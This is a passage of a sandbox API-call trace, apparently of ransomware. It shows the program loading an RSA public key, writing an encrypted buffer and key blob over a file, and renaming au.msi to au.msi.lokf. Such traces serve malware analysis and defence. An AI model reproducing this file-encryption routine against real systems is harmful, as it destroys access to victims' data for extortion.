KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0061.308] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0061.308] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0061.308] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0061.308] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8698) returned 1 [0061.308] CryptCreateHash (in: hProv=0x6b8698, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0061.308] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0061.308] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0061.308] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0061.309] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0061.309] GetLastError () returned 0x0 [0061.309] CryptDestroyHash (hHash=0x327cb80) returned 1 [0061.309] CryptReleaseContext (hProv=0x6b8698, dwFlags=0x0) returned 1 [0061.309] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0061.309] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0061.309] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0061.309] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0061.309] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0061.309] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0061.309] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0061.309] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25810) returned 0x9c8dae8 [0061.310] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0061.310] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0061.310] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0061.310] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0061.310] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0061.310] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296380 [0061.310] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c86de8 [0061.310] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c86280 [0061.310] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c86e30 [0061.310] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c86298 [0061.310] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c862c8 [0061.310] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85770 [0061.310] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c862e0 [0061.310] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0061.310] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0061.310] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0061.310] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0061.310] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c862c8 | out: hHeap=0x660000) returned 1 [0061.310] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c862e0 | out: hHeap=0x660000) returned 1 [0061.310] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0061.310] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0061.310] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0061.310] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85770 [0061.310] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278ec0 [0061.310] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c862e0 [0061.310] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0061.310] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c862c8 [0061.310] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f10 [0061.310] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x3234418 [0061.310] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0061.310] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0061.310] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0061.310] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0061.310] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x32425c8 [0061.311] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0061.311] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0061.311] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c862e0 | out: hHeap=0x660000) returned 1 [0061.311] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0061.311] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c862c8 | out: hHeap=0x660000) returned 1 [0061.311] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0061.311] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0061.311] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0061.311] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0061.311] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296380 | out: hHeap=0x660000) returned 1 [0061.311] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0061.311] GetCurrentThreadId () returned 0x9e0 [0061.311] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f5f0 [0061.311] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c8c7f0 [0061.311] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0061.311] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8698 [0061.311] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0061.311] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0061.311] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0061.311] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326fa10 [0061.311] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0061.311] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0061.311] GetCurrentThreadId () returned 0x9e0 [0061.311] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0061.311] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0061.311] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0061.311] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0061.311] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0061.311] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0061.311] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0061.311] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0061.311] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f908 [0061.311] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0061.311] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261528 [0061.312] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0061.312] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f800 [0061.312] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0061.312] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85770 [0061.312] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0061.312] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0061.312] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0061.312] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0061.312] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0061.312] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0061.312] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0061.312] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0061.312] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c862c8 [0061.312] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0061.312] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f00 [0061.312] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0061.312] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0061.312] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0061.312] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0061.312] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0061.312] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c862e0 [0061.312] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0061.312] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0061.312] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0061.312] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c862b0 [0061.312] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0061.312] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c857b8 [0061.312] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0061.312] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f30 [0061.312] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0061.312] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857d0 [0061.312] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0061.312] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857e8 [0061.313] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0061.313] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c862f8 [0061.313] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0061.313] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c857d0 [0061.313] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857e8 | out: hHeap=0x660000) returned 1 [0061.313] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f20 [0061.313] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0061.313] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3240c48 [0061.313] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0061.313] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e3b0 [0061.313] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c862c8 | out: hHeap=0x660000) returned 1 [0061.313] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c862c8 [0061.313] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0061.313] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x204) returned 0x9c711f0 [0061.313] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0061.313] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x3245620 [0061.313] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0061.313] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x210) returned 0x9c87710 [0061.313] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0061.313] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10c) returned 0x3234418 [0061.313] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0061.313] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x3245508 [0061.313] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c862c8 | out: hHeap=0x660000) returned 1 [0061.313] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x32947b0 [0061.313] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3245620 | out: hHeap=0x660000) returned 1 [0061.313] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f6f8 [0061.313] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0061.313] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8698 | out: hHeap=0x660000) returned 1 [0061.313] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f908 | out: hHeap=0x660000) returned 1 [0061.313] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f6f8 | out: hHeap=0x660000) returned 1 [0061.314] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3240c48 | out: hHeap=0x660000) returned 1 [0061.314] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3245508 | out: hHeap=0x660000) returned 1 [0061.314] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c87710 | out: hHeap=0x660000) returned 1 [0061.314] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0061.314] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0061.314] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0061.314] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c862f8 | out: hHeap=0x660000) returned 1 [0061.314] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0061.314] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0061.314] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0061.314] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c862e0 | out: hHeap=0x660000) returned 1 [0061.314] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c862b0 | out: hHeap=0x660000) returned 1 [0061.314] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201228 | out: hHeap=0x660000) returned 1 [0061.314] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257198 | out: hHeap=0x660000) returned 1 [0061.314] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326fa10 | out: hHeap=0x660000) returned 1 [0061.314] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86298 | out: hHeap=0x660000) returned 1 [0061.314] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86e30 | out: hHeap=0x660000) returned 1 [0061.314] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0061.314] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f800 | out: hHeap=0x660000) returned 1 [0061.314] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261528 | out: hHeap=0x660000) returned 1 [0061.314] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32452d8 | out: hHeap=0x660000) returned 1 [0061.315] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242688 | out: hHeap=0x660000) returned 1 [0061.315] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0061.315] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0061.315] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0061.315] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0061.315] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0061.315] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32995a0 | out: hHeap=0x660000) returned 1 [0061.315] WriteFile (in: hFile=0x5cc, lpBuffer=0x9c8dae8*, nNumberOfBytesToWrite=0x25800, lpNumberOfBytesWritten=0x9f4fb14, lpOverlapped=0x0 | out: lpBuffer=0x9c8dae8*, lpNumberOfBytesWritten=0x9f4fb14*=0x25800, lpOverlapped=0x0) returned 1 [0061.315] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c8dae8 | out: hHeap=0x660000) returned 1 [0061.315] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x2d400, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.315] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f5f0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f5f0*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0061.315] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f5f0 | out: hHeap=0x660000) returned 1 [0061.315] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bba0 [0061.315] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x428) returned 0x32947b0 [0061.316] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x32947b0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 41 [0061.316] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x430) returned 0x3297a68 [0061.316] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0061.316] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bba0 | out: hHeap=0x660000) returned 1 [0061.316] WriteFile (in: hFile=0x5cc, lpBuffer=0x3297a68*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x3297a68*, lpNumberOfBytesWritten=0x9f4fb50*=0x28, lpOverlapped=0x0) returned 1 [0061.316] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0061.316] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0061.316] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0061.316] CloseHandle (hObject=0x5cc) returned 1 [0061.319] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adf40 [0061.319] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x890) returned 0x3268798 [0061.319] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adf40 | out: hHeap=0x660000) returned 1 [0061.319] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.msi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.msi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.msi.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.msi.lokf")) returned 1 [0061.319] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0061.319] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0061.319] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.320] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228c60 | out: hHeap=0x660000) returned 1 [0061.320] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7eec92c0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7eec92c0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7eec92c0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x2d400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="au.msi", cAlternateFileName="")) returned 0 [0061.320] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0061.320] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32575c0 | out: hHeap=0x660000) returned 1 [0061.321] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b88b8 | out: hHeap=0x660000) returned 1 [0061.321] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0061.321] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adf40 [0061.321] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0061.321] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.321] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.321] 